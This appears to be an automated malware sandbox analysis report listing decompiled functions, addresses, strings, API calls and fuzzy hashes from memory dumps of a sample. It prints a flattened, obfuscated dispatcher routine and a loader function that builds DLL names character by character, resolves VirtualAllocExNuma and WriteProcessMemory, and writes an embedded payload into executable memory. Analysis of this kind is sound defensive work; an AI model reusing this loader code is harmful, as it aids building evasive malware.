								_pop(_t1276);
								_t1351 = _t1179;
								_t1258 = 0xa0f5b9a;
								goto L42;
							}
							__eflags = _t1353 - 0x3ae01b7;
							if(_t1353 == 0x3ae01b7) {
								_t1179 = E04725542();
								__eflags = _t1179;
								if(__eflags == 0) {
									_t1179 = E0473261D();
								}
								goto L42;
							}
							__eflags = _t1353 - 0x42cce25;
							if(__eflags == 0) {
								_t1179 = E0473B074(_t1276, __eflags);
								__eflags = _t1179;
								if(__eflags == 0) {
									goto L95;
								}
								_t1353 = 0x2e8c6c1;
								continue;
							}
							__eflags = _t1353 - 0x5024f34;
							if(_t1353 == 0x5024f34) {
								__eflags = _t1351 - _v344;
								if(_t1351 == _v344) {
									L37:
									_t1353 = _t1258;
									goto L110;
								}
								_t1179 = E0472F408(_v368, E0473A53C(), _v540, _t1351);
								_pop(_t1276);
								__eflags = _t1179 - _v588;
								if(__eflags == 0) {
									_t1179 = E04741B95();
									goto L37;
								}
								_t1353 = 0xb2e7a18;
								continue;
							}
							__eflags = _t1353 - 0x5955dd2;
							if(_t1353 != 0x5955dd2) {
								goto L110;
							}
							_t1179 = E0472F07C();
							_t1353 = 0x3adcb65;
							continue;
						}
						if(_t1387 == 0) {
							_t1179 = E0472480A();
							_t1353 = 0x7b75f67;
							continue;
						}
						_t1388 = _t1353 - 0x2a1ede3;
						if(_t1388 > 0) {
							__eflags = _t1353 - 0x2dee833;
							if(__eflags == 0) {
								_t1353 = 0x42cce25;
								continue;
							}
							__eflags = _t1353 - 0x2e8c6c1;
							if(_t1353 == 0x2e8c6c1) {
								_t1179 = E0472B40E(_t1258); // executed
								_t1353 = 0x335fb9b;
								continue;
							}
							__eflags = _t1353 - 0x335fb9b;
							if(_t1353 == 0x335fb9b) {
								_t1179 = E0472BA95();
								__eflags = _t1179;
								if(__eflags == 0) {
									goto L95;
								}
								_t1353 = 0xee82d2a;
								continue;
							}
							__eflags = _t1353 - 0x3a1fadc;
							if(_t1353 != 0x3a1fadc) {
								goto L110;
							}
							_t1179 = E0472825D();
							_t1353 = 0x2905ca9;
							continue;
						}
						if(_t1388 == 0) {
							_t1179 = E0473A614();
							goto L95;
						}
						if(_t1353 == 0x1e03b6) {
							_t1179 = _v448;
							_t1353 = 0xa0f5b9a;
							_v32 = _t1179;
							continue;
						}
						if(_t1353 == 0xed5c8d) {
							_t1179 = E0473E5A8();
							_v24 = _t1179;
							_t1353 = 0xbb832f1;
							continue;
						}
						if(_t1353 == 0x2905ca9) {
							_v132 = E04736189(_v472, _v524, __eflags, _v168, _v316, 0x4721060,  &_v128);
							_v140 = E04736189(_v556, _v628, __eflags, _v392, _v212, 0x4721000,  &_v136);
							_t1213 = E0473B0DD(_v352,  &_v132,  &_v140, _v464);
							asm("sbb esi, esi");
							_t1353 = ( ~_t1213 & 0x052aa28e) + 0x9e27a8;
							E047263E1(_v300, _v140, _v492, _v620);
							_t1276 = _v612;
							_t1179 = E047263E1(_v612, _v132, _v384, _v456);
							_t1383 = _t1383 + 0x38;
							goto L110;
						}
						if(_t1353 != 0x291cb69) {
							goto L110;
						} else {
							_t1276 = _v124;
							_t1179 = E0472CE30(_v124, _v452, _v164, _v636, _v564);
							_t1383 = _t1383 + 0xc;
							goto L12;
						}
					}
					__eflags = _t1353 - 0xbdc1161;
					if(__eflags > 0) {
						__eflags = _t1353 - 0xe2308a8;
						if(__eflags > 0) {
							__eflags = _t1353 - 0xe76f942;
							if(_t1353 == 0xe76f942) {
								E0472EE23();
								_t1353 = 0xd83367e;
								goto L110;
							}
							__eflags = _t1353 - 0xea301c6;
							if(_t1353 == 0xea301c6) {
								_t1276 =  &_v76;
								_t1179 = E0472226A( &_v76,  &_v124, _v348, _v184, _v356);
								_t1383 = _t1383 + 0xc;
								asm("sbb esi, esi");
								_t1353 = ( ~_t1179 & 0x0421018c) + 0x291cb69;
								goto L1;
							}
							__eflags = _t1353 - 0xee82d2a;
							if(_t1353 != 0xee82d2a) {
								goto L110;
							}
							_t1179 = E047243A9(_t1276);
							__eflags = _t1179;
							if(__eflags == 0) {
								goto L95;
							}
							_t1353 = 0x8b2c8b3;
							goto L1;
						}
						if(__eflags == 0) {
							_v72 = E0473F361();
							_t1276 = _v372;
							_t1179 = E047351BE(_v372, _v200, _t1217, _v380, _v388);
							_t1383 = _t1383 + 0xc;
							_v68 = _t1179;
							_t1353 = 0x9ca4304;
							goto L1;
						}
						__eflags = _t1353 - 0xbec21e1;
						if(_t1353 == 0xbec21e1) {
							__eflags = E04730F1B();
							if(__eflags == 0) {
								_t1179 = E04725542();
								asm("sbb esi, esi");
								_t1353 = ( ~_t1179 & 0x012c9463) + 0x5955dd2;
								goto L1;
							}
							_t1179 = E04725542();
							asm("sbb esi, esi");
							_t1363 =  ~_t1179 & 0x050503f3;
							L98:
							_t1353 = _t1363 + 0x7cf5132;
							goto L1;
						}
						__eflags = _t1353 - 0xcd45525;
						if(_t1353 == 0xcd45525) {
							_t1179 = E0472CF39();
							asm("sbb esi, esi");
							_t1363 =  ~_t1179 & 0x05b3e54c;
							__eflags = _t1363;
							goto L98;
						}
						__eflags = _t1353 - 0xd48dd61;
						if(_t1353 == 0xd48dd61) {
							_t1179 = E047309F3();
							asm("sbb esi, esi");
							_t1353 = ( ~_t1179 & 0xf7c1a984) + 0xbec21e1;
							goto L1;
						}
						__eflags = _t1353 - 0xd83367e;
						if(_t1353 != 0xd83367e) {
							goto L110;
						}
						_push(_v496);
						_t1179 = E04737C07(_v324, _v488, _t1276, _v336);
						goto L95;
					}
					if(__eflags == 0) {
						_t1179 = _v428;
						_t1353 = 0x1e03b6;
						_v28 = _t1179;
						goto L1;
					}
					__eflags = _t1353 - 0x9ca4304;
					if(__eflags > 0) {
						__eflags = _t1353 - 0xa0f5b9a;
						if(_t1353 == 0xa0f5b9a) {
							_t1276 = _v224;
							_t1179 = E0473187A(_v224, _v232, _v240,  &_v44, _v560);
							_t1383 = _t1383 + 0xc;
							_t1353 = 0xea301c6;
							goto L1;
						}
						__eflags = _t1353 - 0xb2e7a18;
						if(_t1353 == 0xb2e7a18) {
							_t1179 = E04725379(_t1276);
							goto L95;
						}
						__eflags = _t1353 - 0xb85b595;
						if(_t1353 == 0xb85b595) {
							_t1276 = _v476;
							_t1179 = E0473F43B(_v476, _v272, _v480, _v280,  &_v88);
							_t1383 = _t1383 + 0xc;
							__eflags = _t1179;
							if(__eflags == 0) {
								_t1179 = _v80;
								__eflags = _t1179;
								if(_t1179 == 0) {
									_t1351 = E0473E813(_v484, _v460);
									_t1179 = _v80;
									_pop(_t1276);
								}
								__eflags = _t1179 - 1;
								if(__eflags == 0) {
									_t1179 = E0473E813(_v436, _v248);
									_pop(_t1276);
									_t1351 = _t1179;
								}
							} else {
								_t1351 = _v264;
							}
							_t1258 = 0xa0f5b9a;
							_t1353 = 0x3ae01b7;
							goto L1;
						}
						__eflags = _t1353 - 0xbb832f1;
						if(_t1353 != 0xbb832f1) {
							goto L110;
						}
						_t1179 = E047424FA();
						_v56 = _t1179;
						_t1353 = 0xbdc1161;
						goto L1;
					}
					if(__eflags == 0) {
						_t1179 = E0473A37F();
						_v16 = _t1179;
						_t1353 = 0xed5c8d;
						goto L1;
					}
					__eflags = _t1353 - 0x7cf5132;
					if(_t1353 == 0x7cf5132) {
						_t1179 = E047251C2();
						_t1353 = 0x3a1fadc;
						goto L1;
					}
					__eflags = _t1353 - 0x86b14cd;
					if(_t1353 == 0x86b14cd) {
						E0472E6C7();
						_t1179 = E04725542();
						asm("sbb esi, esi");
						_t1353 = ( ~_t1179 & 0xfb11ec47) + 0xe76f942;
						goto L1;
					}
					__eflags = _t1353 - 0x8b2c8b3;
					if(_t1353 == 0x8b2c8b3) {
						_t1179 = E047374A8();
						__eflags = _t1179;
						if(__eflags == 0) {
							goto L95;
						}
						_t1353 = 0xd48dd61;
						goto L1;
					}
					__eflags = _t1353 - 0x988e589;
					if(_t1353 != 0x988e589) {
						goto L110;
					}
					_t1179 = E047299D7();
					_t1353 = 0xe76f942;
					goto L1;
					L110:
					__eflags = _t1353 - 0x9e27a8;
				} while (__eflags != 0);
				goto L95;
			}

0x0473fcde
0x0473fce4
0x0473fcee
0x0473fcf6
0x0473fd07
0x0473fd0b
0x0473fd10
0x0473fd18
0x0473fd23
0x0473fd2b
0x0473fd36
0x0473fd4a
0x0473fd4f
0x0473fd58
0x0473fd60
0x0473fd68
0x0473fd73
0x0473fd7e
0x0473fd89
0x0473fd94
0x0473fd9f
0x0473fdaa
0x0473fdbc
0x0473fdc1
0x0473fdd1
0x0473fdd4
0x0473fddb
0x0473fde6
0x0473fdee
0x0473fdfb
0x0473fe04
0x0473fe08
0x0473fe10
0x0473fe1b
0x0473fe26
0x0473fe31
0x0473fe39
0x0473fe40
0x0473fe4b
0x0473fe56
0x0473fe61
0x0473fe69
0x0473fe74
0x0473fe7f
0x0473fe8a
0x0473fe95
0x0473fe9d
0x0473fea5
0x0473fead
0x0473feb2
0x0473feba
0x0473fec2
0x0473feca
0x0473fed2
0x0473feda
0x0473fee2
0x0473fef5
0x0473fefc
0x0473ff07
0x0473ff0f
0x0473ff17
0x0473ff1c
0x0473ff24
0x0473ff2e
0x0473ff36
0x0473ff3e
0x0473ff46
0x0473ff4b
0x0473ff53
0x0473ff5e
0x0473ff69
0x0473ff74
0x0473ff7f
0x0473ff8a
0x0473ff92
0x0473ff9d
0x0473ffa8
0x0473ffb3
0x0473ffbe
0x0473ffc9
0x0473ffd4
0x0473ffdf
0x0473ffea
0x0473fff5
0x0473fffd
0x04740008
0x04740013
0x04740027
0x0474002c
0x04740035
0x04740040
0x0474004b
0x04740056
0x04740061
0x0474006c
0x04740077
0x0474007f
0x0474008a
0x04740095
0x047400a7
0x047400ac
0x047400b5
0x047400c0
0x047400cb
0x047400d6
0x047400de
0x047400e9
0x047400f1
0x047400f6
0x047400fe
0x04740106
0x0474010e
0x04740116
0x0474011e
0x04740126
0x0474012e
0x04740136
0x04740143
0x04740144
0x04740148
0x04740152
0x04740156
0x0474015e
0x04740169
0x0474017d
0x04740184
0x0474018f
0x0474019a
0x047401a2
0x047401ad
0x047401c3
0x047401c8
0x047401cf
0x047401da
0x047401e5
0x047401ed
0x047401f5
0x04740200
0x0474020b
0x04740216
0x0474021e
0x04740229
0x04740234
0x0474023c
0x04740247
0x04740252
0x0474025d
0x04740272
0x04740275
0x0474027c
0x04740287
0x04740292
0x0474029d
0x047402a8
0x047402b0
0x047402bb
0x047402c3
0x047402d3
0x047402d7
0x047402df
0x047402e7
0x047402f2
0x047402fa
0x04740301
0x0474030c
0x04740314
0x0474031c
0x04740321
0x04740329
0x04740331
0x0474033c
0x04740347
0x04740352
0x0474035d
0x0474036d
0x04740374
0x0474037f
0x04740395
0x0474039c
0x047403ae
0x047403b3
0x047403bc
0x047403c7
0x047403d2
0x047403dd
0x047403e8
0x047403f3
0x04740405
0x04740408
0x0474040f
0x0474041c
0x04740424
0x0474042c
0x04740434
0x0474043c
0x04740444
0x04740452
0x04740457
0x0474045d
0x04740465
0x0474046d
0x04740475
0x04740480
0x0474048b
0x04740493
0x0474049e
0x047404a9
0x047404b4
0x047404bf
0x047404ca
0x047404d5
0x047404e0
0x047404eb
0x047404f6
0x047404fe
0x04740509
0x04740514
0x0474051f
0x04740527
0x04740532
0x0474053d
0x04740545
0x04740550
0x0474055b
0x04740566
0x0474056e
0x0474057b
0x0474057e
0x04740582
0x0474058a
0x04740592
0x0474059a
0x047405a7
0x047405ab
0x047405b3
0x047405bb
0x047405c6
0x047405d1
0x047405dc
0x047405e7
0x047405f2
0x047405fd
0x04740608
0x04740613
0x04740625
0x04740628
0x0474062f
0x0474063a
0x0474064d
0x04740654
0x0474065f
0x0474066a
0x04740675
0x04740680
0x0474068b
0x04740696
0x047406a1
0x047406b8
0x047406bb
0x047406c2
0x047406cd
0x047406d8
0x047406e3
0x047406f6
0x047406fd
0x04740708
0x04740713
0x0474071b
0x04740726
0x04740731
0x0474073c
0x04740747
0x04740752
0x0474075d
0x04740768
0x04740770
0x0474077b
0x04740786
0x04740791
0x0474079c
0x047407a7
0x047407b2
0x047407bd
0x047407c8
0x047407d4
0x047407d9
0x047407e3
0x047407e6
0x047407ea
0x047407f2
0x047407fa
0x04740805
0x04740810
0x0474081b
0x04740826
0x04740831
0x0474083c
0x04740847
0x04740852
0x0474085d
0x04740868
0x04740870
0x0474087b
0x04740886
0x04740891
0x0474089c
0x047408a4
0x047408a9
0x047408ae
0x047408b3
0x047408bb
0x047408c6
0x047408d1
0x047408d9
0x047408e4
0x047408ef
0x047408f7
0x04740902
0x04740915
0x04740924
0x0474092b
0x04740936
0x0474093e
0x04740948
0x04740957
0x04740958
0x0474095c
0x04740964
0x0474096f
0x0474097a
0x04740981
0x0474098c
0x04740997
0x047409a2
0x047409ad
0x047409b5
0x047409ba
0x047409c2
0x047409cd
0x047409d8
0x047409e3
0x047409ee
0x047409f9
0x04740a04
0x04740a0f
0x04740a1a
0x04740a25
0x04740a38
0x04740a3f
0x04740a4a
0x04740a55
0x04740a60
0x04740a68
0x04740a6d
0x04740a78
0x04740a7c
0x04740a84
0x04740a8c
0x04740a94
0x04740a9c
0x04740aa1
0x04740aa9
0x04740ab4
0x04740abf
0x04740aca
0x04740ad5
0x04740add
0x04740ae4
0x04740aef
0x04740afa
0x04740b02
0x04740b0d
0x04740b18
0x04740b23
0x04740b2e
0x04740b39
0x04740b44
0x04740b4f
0x04740b5a
0x04740b65
0x04740b70
0x04740b7b
0x04740b86
0x04740b91
0x04740b9c
0x04740ba7
0x04740baf
0x04740bb4
0x04740bbc
0x04740bc4
0x04740bcc
0x04740bd7
0x04740be2
0x04740bed
0x04740bf8
0x04740c03
0x04740c10
0x04740c1b
0x04740c23
0x04740c2e
0x04740c3d
0x04740c40
0x04740c49
0x04740c52
0x04740c56
0x04740c5e
0x04740c69
0x04740c74
0x04740c7f
0x04740c8a
0x04740c95
0x04740ca0
0x04740cab
0x04740cb3
0x04740cbe
0x04740cc9
0x04740cd1
0x04740cd9
0x04740ce4
0x04740cec
0x04740cf1
0x04740cf9
0x04740cfe
0x04740d06
0x04740d19
0x04740d20
0x04740d2b
0x04740d36
0x04740d41
0x04740d4c
0x04740d57
0x04740d5f
0x04740d67
0x04740d6f
0x04740d77
0x04740d7f
0x04740d87
0x04740d8f
0x04740d94
0x04740d98
0x04740da0
0x04740dab
0x04740db6
0x04740dbe
0x04740dc9
0x04740ddf
0x04740de6
0x04740df1
0x04740dfc
0x04740e04
0x04740e10
0x04740e13
0x04740e17
0x04740e1c
0x04740e24
0x04740e2f
0x04740e3a
0x04740e45
0x04740e50
0x04740e58
0x04740e63
0x04740e6b
0x04740e76
0x04740e81
0x04740e89
0x04740e96
0x04740ea1
0x04740eac
0x04740eb4
0x04740ebc
0x04740ec7
0x04740ed2
0x04740edd
0x04740ee8
0x04740ef3
0x04740efe
0x04740f09
0x04740f14
0x04740f1c
0x04740f27
0x04740f32
0x04740f3d
0x04740f48
0x04740f53
0x04740f6d
0x04740f74
0x04740f7b
0x04740f86
0x04740f91
0x04740f99
0x04740fa3
0x04740fa7
0x04740faf
0x04740fb7
0x04740fc2
0x04740fcd
0x04740fd8
0x04740fe3
0x04740fee
0x04740ff6
0x04741001
0x04741014
0x0474101b
0x04741023
0x0474102e
0x04741039
0x04741041
0x04741049
0x04741054
0x0474105f
0x0474106a
0x04741072
0x0474107d
0x04741088
0x04741093
0x0474109e
0x047410a9
0x047410b4
0x047410bf
0x047410ca
0x047410d5
0x047410e0
0x047410e8
0x047410e8
0x047410f3
0x047410f3
0x047410f3
0x047410f3
0x047410f9
0x00000000
0x00000000
0x047410ff
0x047415bd
0x047415c2
0x047415c4
0x04741851
0x04741858
0x04741858
0x047415ca
0x00000000
0x047415ca
0x04741105
0x0474110b
0x04741336
0x0474133c
0x047414b0
0x047414b6
0x04741585
0x04741591
0x047415ab
0x047415b1
0x047415b2
0x0474117a
0x0474117a
0x00000000
0x0474117a
0x047414bc
0x047414c2
0x04741524
0x04741551
0x04741558
0x0474155d
0x04741564
0x0474156c
0x00000000
0x0474156c
0x047414c4
0x047414ca
0x04741511
0x04741516
0x00000000
0x04741516
0x047414cc
0x047414d2
0x00000000
0x00000000
0x047414f1
0x047414f8
0x047414fd
0x04741500
0x00000000
0x04741500
0x04741342
0x0474143b
0x04741451
0x04741456
0x04741459
0x0474145b
0x04741483
0x0474148a
0x0474148d
0x04741499
0x0474149b
0x047414a6
0x047414a6
0x00000000
0x047414a6
0x0474149d
0x047414a0
0x0474141f
0x0474141f
0x00000000
0x0474141f
0x00000000
0x047414a0
0x0474148f
0x00000000
0x0474148f
0x04741476
0x0474147c
0x0474147d
0x0474147f
0x00000000
0x0474147f
0x04741348
0x0474134e
0x0474140a
0x0474140f
0x04741411
0x0474141a
0x0474141a
0x00000000
0x04741411
0x04741354
0x0474135a
0x047413e8
0x047413ed
0x047413ef
0x00000000
0x00000000
0x047413f5
0x00000000
0x047413f5
0x0474135c
0x04741362
0x04741386
0x0474138d
0x047413d3
0x047413d3
0x00000000
0x047413d3
0x047413a9
0x047413af
0x047413b0
0x047413b4
0x047413ce
0x00000000
0x047413ce
0x047413b6
0x00000000
0x047413b6
0x04741364
0x0474136a
0x00000000
0x00000000
0x04741377
0x0474137c
0x00000000
0x0474137c
0x04741111
0x04741327
0x0474132c
0x00000000
0x0474132c
0x04741117
0x0474111d
0x04741299
0x0474129f
0x0474130f
0x00000000
0x0474130f
0x047412a1
0x047412a7
0x04741300
0x04741305
0x00000000
0x04741305
0x047412a9
0x047412af
0x047412e2
0x047412e7
0x047412e9
0x00000000
0x00000000
0x047412ef
0x00000000
0x047412ef
0x047412b1
0x047412b7
0x00000000
0x00000000
0x047412c8
0x047412cd
0x00000000
0x047412cd
0x04741123
0x047419fe
0x00000000
0x047419fe
0x0474112f
0x04741284
0x0474128b
0x0474128d
0x00000000
0x0474128d
0x0474113b
0x0474126e
0x04741273
0x0474127a
0x00000000
0x0474127a
0x04741147
0x047411b2
0x047411f9
0x04741208
0x0474122a
0x04741232
0x04741238
0x04741252
0x04741256
0x0474125b
0x00000000
0x0474125b
0x0474114f
0x00000000
0x04741155
0x0474116b
0x04741172
0x04741177
0x00000000
0x04741177
0x0474114f
0x047415d4
0x047415da
0x047417f2
0x047417f8
0x0474194f
0x04741955
0x047419d5
0x047419da
0x00000000
0x047419da
0x04741957
0x0474195d
0x047419a1
0x047419af
0x047419b4
0x047419bb
0x047419c3
0x00000000
0x047419c3
0x0474195f
0x04741965
0x00000000
0x00000000
0x04741975
0x0474197a
0x0474197c
0x00000000
0x00000000
0x04741982
0x00000000
0x04741982
0x047417fe
0x04741919
0x0474192e
0x04741936
0x0474193b
0x0474193e
0x04741945
0x00000000
0x04741945
0x04741804
0x0474180a
0x047418b3
0x047418b5
0x047418e3
0x047418ec
0x047418f4
0x00000000
0x047418f4
0x047418c2
0x047418cb
0x047418cd
0x04741898
0x04741898
0x00000000
0x04741898
0x04741810
0x04741816
0x04741887
0x04741890
0x04741892
0x04741892
0x00000000
0x04741892
0x04741818
0x0474181e
0x0474185d
0x04741866
0x0474186e
0x00000000
0x0474186e
0x04741820
0x04741826
0x00000000
0x00000000
0x0474182c
0x04741849
0x00000000
0x0474184e
0x047415e0
0x047417da
0x047417e1
0x047417e6
0x00000000
0x047417e6
0x047415e6
0x047415ec
0x047416bf
0x047416c1
0x047417c1
0x047417c8
0x047417cd
0x047417d0
0x00000000
0x047417d0
0x047416c7
0x047416cd
0x04741a16
0x00000000
0x04741a16
0x047416d3
0x047416d9
0x04741721
0x04741728
0x0474172d
0x04741730
0x04741732
0x0474173d
0x04741744
0x04741746
0x0474176a
0x0474176c
0x04741773
0x04741773
0x04741774
0x04741777
0x04741792
0x04741798
0x04741799
0x04741799
0x04741734
0x04741734
0x04741734
0x0474179b
0x0474179d
0x00000000
0x0474179d
0x047416db
0x047416e1
0x00000000
0x00000000
0x047416ee
0x047416f3
0x047416fa
0x00000000
0x047416fa
0x047415f2
0x047416a9
0x047416ae
0x047416b5
0x00000000
0x047416b5
0x047415f8
0x047415fe
0x04741693
0x04741698
0x00000000
0x04741698
0x04741604
0x0474160a
0x0474165c
0x0474166c
0x04741675
0x0474167d
0x00000000
0x0474167d
0x0474160c
0x04741612
0x04741641
0x04741646
0x04741648
0x00000000
0x00000000
0x0474164e
0x00000000
0x0474164e
0x04741614
0x0474161a
0x00000000
0x00000000
0x0474162e
0x04741633
0x00000000
0x047419df
0x047419df
0x047419df
0x00000000

Strings

\\E, xrefs: 047403DD
k5(, xrefs: 04740BCC
bZN, xrefs: 047404E0
e%<, xrefs: 04740ABF
@hQ, xrefs: 047409E3
yXx, xrefs: 04740AEF
OB8, xrefs: 047401F5
am, xrefs: 04740056
~F=, xrefs: 04740FAF
'UF, xrefs: 047402F2
&,, xrefs: 04740287
%hZ, xrefs: 0473FE31
*O, xrefs: 04740475
Xf, xrefs: 0473FEBA
hOy.TOF, xrefs: 0474096F
G, xrefs: 047405AB
`d@, xrefs: 0473FFA8
$f*, xrefs: 0474089C
\], xrefs: 04740200
XK, xrefs: 0473FDEE
on, xrefs: 04740F3D
.TOF, xrefs: 047408F7

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: OB8$~F=$ *O$$f*$%hZ$&,$'UF$.TOF$@hQ$G$XK$Xf$\\E$\]$`d@$am$bZN$e%<$hOy.TOF$k5($on$yXx
API String ID: 0-3955337712
Opcode ID: 81a5942a68f40b9f71463b53fb2177e1d6f1833f3f6d30fdd3e9b5ae7a955b72
Instruction ID: aa873eb00edd7229047b5bada62fe10f42f25389d4dc61f7db0256b4b1b96cd7
Opcode Fuzzy Hash: 81a5942a68f40b9f71463b53fb2177e1d6f1833f3f6d30fdd3e9b5ae7a955b72
Instruction Fuzzy Hash: FDD210729093818BD3B8DF25C58A7DFBBE1BBC5318F50891DE5D996220D7B09988CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10003097, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 153
librarymemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10003097(void* __edx) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				struct HINSTANCE__* _t30;
				short _t31;
				short _t32;
				short _t33;
				short _t34;
				short _t35;
				short _t36;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr* _t48;
				void* _t49;
				void* _t51;
				intOrPtr _t54;
				void* _t59;
				short _t61;
				short _t62;
				short _t63;
				short _t64;
				short _t65;
				short _t67;
				short _t68;
				short _t69;
				short _t70;
				short _t71;
				short _t72;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t85;

				_t78 = __edx;
				_t28 =  *0x10031c30; // 0x1f496801
				_v8 = _t28 ^ _t85;
				_t30 = LoadLibraryA("whoami.exe"); // executed
				if(_t30 == 0) {
					MessageBoxA(0, 0x1002b5d8, 0, 0);
					ExitProcess(0xfff4518a);
				}
				_t31 = 0x6b;
				_v56 = _t31;
				_t32 = 0x65;
				_v54 = _t32;
				_t33 = 0x72;
				_v52 = _t33;
				_t34 = 0x6e;
				_v50 = _t34;
				_t35 = 0x65;
				_v48 = _t35;
				_t36 = 0x6c;
				_v46 = _t36;
				_t61 = 0x33;
				_v44 = _t61;
				_t62 = 0x32;
				_v42 = _t62;
				_t63 = 0x2e;
				_v40 = _t63;
				_t64 = 0x64;
				_v38 = _t64;
				_t65 = _t36;
				_v36 = _t65;
				_v34 = _t65;
				_v32 = 0;
				_t67 = 0x6e;
				_v28 = _t67;
				_t68 = 0x74;
				_v26 = _t68;
				_t69 = 0x64;
				_v24 = _t69;
				_t70 = _t36;
				_v22 = _t70;
				_v20 = _t70;
				_t71 = 0x2e;
				_v18 = _t71;
				_t72 = 0x64;
				_v16 = _t72;
				_t73 = _t36;
				_v12 = _t36;
				_v10 = 0;
				_push( &_v56);
				 *0x100568ec = 0;
				 *0x100568f0 = 0;
				 *0x100568f4 = 0;
				 *0x100568f8 = 0;
				 *0x100568fc = 0;
				_v14 = _t36;
				 *0x100592ac = E10002F95(_t36);
				_push( &_v28);
				_t41 = E10002F95(_t73);
				_t79 =  *0x100592ac; // 0x74770000
				 *0x100592b0 = _t41;
				_t43 = E10002765("VirtualAlloc", _t79);
				_t80 =  *0x100592ac; // 0x74770000
				 *0x100592a0 = _t43;
				_t45 = E10002765("VirtualAllocExNuma", _t80);
				_t81 =  *0x100592ac; // 0x74770000
				 *0x100592a4 = _t45;
				 *0x100592a8 = E10002765("WriteProcessMemory", _t81);
				_t48 =  *0x100592a4;
				_t89 = _t48;
				if(_t48 == 0) {
					_t49 = VirtualAlloc(0, 0x23800, 0x3000, 0x40);
				} else {
					_t49 =  *_t48(0xffffffff, 0, 0x23800, 0x3000, 0x40, 0); // executed
				}
				_t59 = _t49;
				WriteProcessMemory(0xffffffff, _t59, 0x100330b8, 0x23800, 0); // executed
				_t51 = E10013020(_t59, _t78, 0x23800, 0x1258); // executed
				_t84 = _t51;
				_push(_t51);
				E10002C04(_t89);
				_push(_t59);
				E10002DF2();
				_t54 = E100027F9(_t89, _t59); // executed
				 *0x100592b4 = _t54;
				return E100127FF(1, _t59, _v8 ^ _t85, _t78, 0x23800, _t84, _t84);
			}

0x10003097
0x1000309d
0x100030a4
0x100030af
0x100030b9
0x100030c3
0x100030ce
0x100030ce
0x100030d6
0x100030d9
0x100030dd
0x100030e0
0x100030e4
0x100030e7
0x100030eb
0x100030ee
0x100030f2
0x100030f5
0x100030f9
0x100030fe
0x10003102
0x10003105
0x10003109
0x1000310c
0x10003110
0x10003113
0x10003117
0x10003118
0x1000311c
0x1000311e
0x10003122
0x1000312a
0x1000312e
0x10003131
0x10003135
0x10003138
0x1000313c
0x1000313d
0x10003141
0x10003145
0x10003149
0x1000314d
0x1000314e
0x10003154
0x10003155
0x10003159
0x1000315b
0x10003161
0x10003168
0x10003169
0x1000316f
0x10003175
0x1000317b
0x10003181
0x10003187
0x10003190
0x10003198
0x10003199
0x1000319e
0x100031a5
0x100031b0
0x100031b5
0x100031bb
0x100031c5
0x100031ca
0x100031d0
0x100031df
0x100031e4
0x100031ee
0x100031f0
0x1000320b
0x100031f2
0x100031fe
0x100031fe
0x10003218
0x1000321d
0x10003228
0x1000322d
0x1000322f
0x10003230
0x10003235
0x10003237
0x1000323d
0x10003249
0x1000325b

APIs

LoadLibraryA.KERNEL32(whoami.exe,?,?,?), ref: 100030AF
MessageBoxA.USER32 ref: 100030C3
ExitProcess.KERNEL32 ref: 100030CE
VirtualAllocExNuma.KERNEL32(000000FF,00000000,00023800,00003000,00000040,00000000,?,?,?), ref: 100031FE

Strings

VirtualAllocExNuma, xrefs: 100031C0
WriteProcessMemory, xrefs: 100031D5
whoami.exe, xrefs: 100030AA
VirtualAlloc, xrefs: 100031AB

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExitLibraryLoadMessageNumaProcessVirtual
String ID: VirtualAlloc$VirtualAllocExNuma$WriteProcessMemory$whoami.exe
API String ID: 1544653228-702461958
Opcode ID: f0b788165e97c1a0bbc9401ac8c6c2671ee1fd7048783d165f0e32939980e461
Instruction ID: 71516b96d32c1a51f6cbeaa2f3cdbdf2c053bfba03f70314cbabd6e01f22a627
Opcode Fuzzy Hash: f0b788165e97c1a0bbc9401ac8c6c2671ee1fd7048783d165f0e32939980e461
Instruction Fuzzy Hash: AB51C631A19324BEFB00DFA4AC45EAE77B9EF49750F10551AF104EB2E0EBB15940C769

Uniqueness

Uniqueness Score: -1.00%

Function 04736349, Relevance: 10.4, Strings: 8, Instructions: 396COMMON

Download Yara Rule

Strings

j+>, xrefs: 04736758
PJ5, xrefs: 04736804
Tse, xrefs: 047366D8
i, xrefs: 047363B7
tB], xrefs: 047368A8
Tse, xrefs: 047364A8
/ , xrefs: 047364CD
`,, xrefs: 04736818

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: / $PJ5$Tse$Tse$`,$i$j+>$tB]
API String ID: 0-1356006663
